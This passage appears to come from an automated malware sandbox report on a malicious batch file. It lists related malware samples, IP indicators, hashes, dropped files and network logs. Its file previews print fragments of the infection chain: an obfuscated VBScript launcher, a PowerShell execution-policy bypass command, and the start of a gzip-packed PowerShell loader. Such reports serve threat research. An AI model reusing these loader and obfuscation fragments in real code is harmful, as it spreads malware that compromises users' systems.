                                                                                                      • 5.9.250.61
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 49.13.42.140
                                                                                                      PHMGMT-AS1USN1f691bk5G.ps1Get hashmaliciousAsyncRATBrowse
                                                                                                      • 178.208.169.197
                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 178.208.190.219
                                                                                                      amen.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 45.255.208.12
                                                                                                      2xPiYIsfF2.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.103.230
                                                                                                      OhWWbQcp7Q.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                      • 128.90.129.125
                                                                                                      hb21QzBgft.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                      • 128.90.129.125
                                                                                                      U2DhKOFGy6.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      uVyl5BbR2M.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      ahMvIr4vjN.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125
                                                                                                      WlewaiA251.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 128.90.129.125

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81
                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 168.119.208.219
                                                                                                      • 34.117.59.81

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):203
                                                                                                      Entropy (8bit):5.299439045576121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:G0FOd2PAZ/M0/jZj8XIBMSRVya5PaHKssMQ:BFKl/jZjCSRVBPeQ
                                                                                                      MD5:48C375C039C9FE2017AF2E593D3FA715
                                                                                                      SHA1:684CD6086BA8982E1D9E37FA8DE48A1CBEE37838
                                                                                                      SHA-256:75F0028EA10F4ED9120E1F39ED5CAC7D9406F33C38D753CAB48E35C2D1023858
                                                                                                      SHA-512:A86BD0CAFFE36E28F122EAD39F87F70A837D1C3588FB75510BCFE82A1D49978CF0927E5D29249A82A0701FF6938B1A4F7E97756BB3579B4CE9C1979C1DE879E5
                                                                                                      Malicious:true
                                                                                                      Preview:..Set MLDFUIFHSDCCQ = CreateObject("W" + ChrW(83) + "cript" + ChrW(46) + "Shell")..MLDFUIFHSDCCQ.Run(UpdaDI()),ChrW(48).Function UpdaDI().UpdaDI = UpdaDI + "C:\Users\Public\AXAGFIIEZBBS.bat".End Function

                                                                                                      C:\Users\Public\AXAGFIIEZBBS.bat

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):161
                                                                                                      Entropy (8bit):4.90173435614428
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:3AXq5MzYAGQqPJH0cVERAIrFjFC8hwjuucquuXj/quM8Pk+jVWvAJEXQhQBG:n5IYAGQO0cbY4mwSuJua//cYxY4Qs
                                                                                                      MD5:65774B43ED7213533BDBAACC392DE387
                                                                                                      SHA1:D092142CCC5B88899DA0091806D5249AC8D2EA04
                                                                                                      SHA-256:7C546286995AC2ACAF515D4105FFDB18F4FD6F69B1D7EBA583251B58532EF61D
                                                                                                      SHA-512:0B666036C54D77FCCBA4F77002FBCA7FA43E30E73D7F67AEEDF628DB81A442D0955B191475F670EA4E736CFB0E67A6E120CCFF17CC517AB7D6A073F2ECC7CEDF
                                                                                                      Malicious:true
                                                                                                      Preview:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"

                                                                                                      C:\Users\Public\LMKGJHPBNG.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (64623)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):255748
                                                                                                      Entropy (8bit):3.1900458877489832
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:NYzrwIovquFT/TO5HiSujupnwIE6YcG47rwnv1IJ5YH1llykZXvyd2b5uDSPVZrB:b
                                                                                                      MD5:33B6C435BDBBEC12AE8CBA21EB6D105F
                                                                                                      SHA1:41D43DC4EC1187E6120F26158E074E39475B0815
                                                                                                      SHA-256:D4F4D3196D92B306F65BA4F1F90EC73403803530A58196B48DB38210E3E3047D
                                                                                                      SHA-512:8B11308F7E16DC54E1559591D2D741F0A53D0A90C7DDB33BC817D15EDCDC46DC4EBEDD121925DA4C791D7BB8B0A6A74334F63253F6FC3AF453765F62826E4A4F
                                                                                                      Malicious:false
                                                                                                      Preview:.$love = "C:\Windows\Microsoft.".$love1 ="NET\Framework\v4.0.30319\aspnet_compiler.exe".$GBDWVQYONBIQDJWMDKUVUR = $love + $love1.$love2 = "C:\Windows\Microsoft.".$love22 = "NET\Framework\v2.0.50727\aspnet_compiler.exe".$TPNSJKKGOXEEPYKERBJHCHD = $love2 + $love22..function VHPDGARDLG {...[CmdletBinding()]. Param (...[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]. [byte[]] $byteArray = $(Throw("-byteArray is required")). )..Process {.. Write-Verbose "VHPDGARDLG". $input = New-Object System.IO.MemoryStream( , $byteArray ).. $output = New-Object System.IO.MemoryStream. $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress).. $gzipStream.CopyTo( $output ). $gzipStream.Close()...$input.Close()...[byte[]] $byteOutArray = $output.ToArray(). Write-Output $byteOutArray. }.}..[byte[]] $TZPFISFK = VHPDGARDLG(31,139,8,0,0,0,0,0,4,0,180,125,9,124,91,197,209,248,190

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.890472898059848
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2252
                                                                                                      Entropy (8bit):5.7466623645945365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:RXSU4y4RQmFoUeCamfm9qr9te08NfxBH+ffiEwab9npitpyhgFHRj7:RCHyIFKL2O9qr60KfnHMKEw4pitpyhQ7
                                                                                                      MD5:449B65E7629EE5D7264172FD2004F783
                                                                                                      SHA1:4142D4F49F237B734D93E9FA3EFE166D0366B586
                                                                                                      SHA-256:40FDC5A65ADDD1D8D370229DDACEEAA25C3EE7DACDCC188D07C3646C96044C90
                                                                                                      SHA-512:3128A6F3A4B974BB62907B9770C3F99877B3E789F11DDEF5C697247097C096C64E73C16F6BAFB1BC86DF1413443B8C64EB4B90296EF468378DAEC4B85EE230BA
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................R..............@..........@...............M6.]..O....PI.&).......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.@...............(..o...B.Rb&............Microsoft.VisualBasic...P...............

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rfybafm.v10.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acrgl1pt.tjp.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxxl0trm.nne.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmpweely.kgs.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2spqz5b.21d.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xikg1hcy.bym.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\screenshot.png

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):695409
                                                                                                      Entropy (8bit):7.924869791174031
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:N5ycy8sDhXndF1/vKPwAKbk0OWKsQ6l0t+vVGSwiVB3Q8s1RC7OG:N5Ry84ZnZq22DGlRVfBg8yC7J
                                                                                                      MD5:69CB2B5240F4E68C817464A84033ABEA
                                                                                                      SHA1:26763497A02664026B9827DFE16643E7C84D116A
                                                                                                      SHA-256:F290705C9C8033410D5FBA6E160FAD6C8DD35E6BDB211BF733A0B15603915AFA
                                                                                                      SHA-512:D22AC1AB9B6904D5EBC40572708CD51508806E69176979C68C488B1E916ADEA6122F316188229882457BD0FF894568D5B743D2604633938F33FE6B9D6219CE4A
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.eG......K=k.....nf...=s.7mf..W.MO7....".....!.pB....d.........B.;...A.$@....{.v.N.{\...d....x....,A....9..j.<.g...NN.h..^'?7..I.C..t....G.sB....O...:d....k.....q.t.}..|...}.&.......F.../.t?.......*.....Q.t.L..`...=...L.V...m.c..s.##1.......-Ss......'.._>..D.~....*.~.9...-.>z_5..{g...=....H.G.{p.s.,...-S..5>..sVt.\...z.....YT0...'.O,..zw...w..e.;...].R;.......1So.qf.[k..r[......L...b.......5.>^dL...i.xs.7.2..w..n.:o..Z..[..n...7..z...%.}..(.q...'..Gw.......__-..).(.f*./.f..).X...W.c.C.u.e4....6...7WK.K{.{m..u.d...|n.~....}..........w..^.VS{^Su.....~U.._..to).. .v.>.W.S...!..h.....]..s...}..].[.M......_]-.#...x.nin.+3.].hc....Z.W.7.=.v..i.ni....;]..E..........U..........N..%._.Y.[.n....c~Y..K.._....X..;..wL{....c`...R|.4.P.j.K2.v.4..I{.a...e.<bS.}.K....jj.Kr....~..[_....}X.}.....XK.l..f.4.mZ.Z..o...Z.u.n..S. .<0.|........lv~........S.....

                                                                                                      C:\Users\user\AppData\Roaming\device_id.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):78
                                                                                                      Entropy (8bit):2.956426879523995
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:QBelFslh6ElYRlUdIelXGlBwOGkpl4vl:QInEZnSeFGlHGkp29
                                                                                                      MD5:709D25F6948BF2877CB5DFC98D2D34F6
                                                                                                      SHA1:035683D074ED570809C21FDFA4E939830BF05A4B
                                                                                                      SHA-256:081AF7F140B3F0742D80DAA2CA9229A09451F0BD6FAF949A7D286D7DD1EF65B4
                                                                                                      SHA-512:160067DCCEDC6D09A83A948E64097FC10BD231D4D899E47E0DAE69F8E458B8EFAABD71ADCBE9155DA85C62FE6D181DBCE274E08FFF7023BE9F5CEBB1A41BD46A
                                                                                                      Malicious:false
                                                                                                      Preview:..d.a.b.9.b.b.f.4.-.a.9.b.a.-.4.1.e.9.-.a.b.7.a.-.e.c.d.d.7.4.1.9.3.6.e.7.....

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:ASCII text, with very long lines (5933)
                                                                                                      Entropy (8bit):4.749366276451975
                                                                                                      TrID:
                                                                                                        File name:Pe4905VGl1.bat
                                                                                                        File size:12'185 bytes
                                                                                                        MD5:4527c576f1af0580c8d96ac23c8f761c
                                                                                                        SHA1:dac3bf00eeb34c9c1d9dca63973f2e04da045383
                                                                                                        SHA256:5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b
                                                                                                        SHA512:7afacd9324fd02c60e927c71d8c4c6b3317984869224da2e6311a4a5963ebb74615ada91af129f9083d771dc069b4578c895c42f8d9154e814e94f8cc28361b9
                                                                                                        SSDEEP:192:kffffffffffffffffffffhffffffffffffffffffffQv/sfffffffffffffffffZ:kffffffffffffffffffffhfffffffffT
                                                                                                        TLSH:E342CD4743132AEE89C53A67E1AB900300F40B791264355D7BED35B3FABF4F992806E9
                                                                                                        File Content Preview::.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCIZJAYNIXRFMLRKUMJBWTGYGJJLHRKRQWBJVUCSMOG.:.:WMYJJPUCHVFWINWFBYSLHHLSLILPCI

                                                                                                        File Icon

                                                                                                        Icon Hash:9686878b929a9886

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 25, 2024 15:22:07.236963034 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.239916086 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.244189978 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.244271040 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.244272947 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.244322062 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.246603012 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.246710062 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.341001034 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.341026068 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.341151953 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.344116926 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.344202042 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.362442017 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.369160891 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.377811909 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.466007948 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.566732883 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.569688082 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.579054117 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.579175949 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.581712961 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.667402983 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.670088053 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.678292990 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.678308010 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.678363085 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.681288958 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.682051897 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.700069904 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.707406998 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.794245958 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.804820061 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.805444956 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.904340982 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.908632994 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:07.995423079 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:07.995556116 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.006055117 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.006182909 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.012157917 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.012269974 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.012357950 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.012392998 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.028985977 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.242964983 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.298346996 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.386502981 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.416971922 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.418853045 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.419133902 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.424030066 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.510176897 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.541935921 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.557485104 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.557496071 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.557504892 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.714462042 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.714473963 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.714565039 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.745309114 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.758167028 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.765114069 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.765212059 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.765222073 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.773514986 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.774336100 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:08.865907907 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.893589973 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.894407988 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:08.915595055 CET4434970313.107.246.63192.168.2.8
